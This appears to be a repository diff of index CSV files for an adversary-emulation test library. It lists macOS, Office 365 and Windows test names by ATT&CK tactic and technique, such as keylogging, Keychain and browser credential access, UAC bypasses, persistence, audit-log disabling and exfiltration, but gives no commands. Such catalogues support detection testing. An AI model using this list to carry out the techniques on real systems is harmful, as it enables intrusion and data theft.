124 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
125 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
126 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
127 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
128 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
129 command-and-control T1090.001 Proxy: Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
130 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
131 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
132 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
133 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
134 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
135 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
136 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
137 collection T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
138 collection T1123 Audio Capture 3 using Quicktime Player c7a0bb71-70ce-4a53-b115-881f241b795b sh
139 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
140 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
141 collection T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
142 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
143 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
144 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
145 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
146 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
147 privilege-escalation T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
148 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
149 privilege-escalation T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
150 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
151 privilege-escalation T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
152 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
153 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
154 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
155 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
156 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
157 privilege-escalation T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
158 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
159 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
160 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
161 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
162 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
163 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
164 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
165 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
166 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
167 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
168 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
169 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
170 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
171 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
172 privilege-escalation T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
173 credential-access T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
174 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
175 credential-access T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
176 credential-access T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
177 credential-access T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
178 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
179 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
180 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 14 Simulating Access to Chrome Login Data - MacOS 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 sh
181 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
182 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
183 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
184 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
185 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 sh
186 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
187 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
188 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
189 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
190 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
191 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
192 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
193 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
194 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
195 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
196 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
197 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
198 discovery T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
199 discovery T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
200 discovery T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
201 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
202 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
203 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
204 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
205 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
206 discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
207 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
208 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
209 discovery T1217 Browser Bookmark Discovery 8 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
210 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
211 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
212 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
213 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
214 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
215 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
216 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
217 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
218 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
219 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
220 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
221 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
222 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
223 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
224 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
225 impact T1531 Account Access Removal 5 Delete User via dscl utility 4d938c43-2fe8-4d70-a5b3-5bf239aa7846 sh
226 impact T1531 Account Access Removal 6 Delete User via sysadminctl utility d3812c4e-30ee-466a-a0aa-07e355b561d6 sh
227 impact T1486 Data Encrypted for Impact 6 Encrypt files using 7z utility - macOS 645f0f5a-ef09-48d8-b9bc-f0e24c642d72 sh
228 impact T1486 Data Encrypted for Impact 7 Encrypt files using openssl utility - macOS 1a01f6b8-b1e8-418e-bbe3-78a6f822759e sh
229 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
230 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
231 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
232 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
233 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
234 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
235 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
236 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
237 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
238 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
239 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
240 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
241 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
242 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
243 initial-access T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
244 initial-access T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
245 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
246 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
247 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
248 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
249 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
atomics/Indexes/Indexes-CSV/office-365-index.csv
-4
View File
@@ -1,4 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 collection T1114.003 Email Collection: Email Forwarding Rule 1 Office365 - Email Forwarding 3234117e-151d-4254-9150-3d0bac41e38c powershell
3 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
4 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 Office 365 - Set Audit Bypass For a Mailbox c9a2f6fe-7197-488c-af6d-10c782121ca6 powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
-1121
View File
@@ -1,1121 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
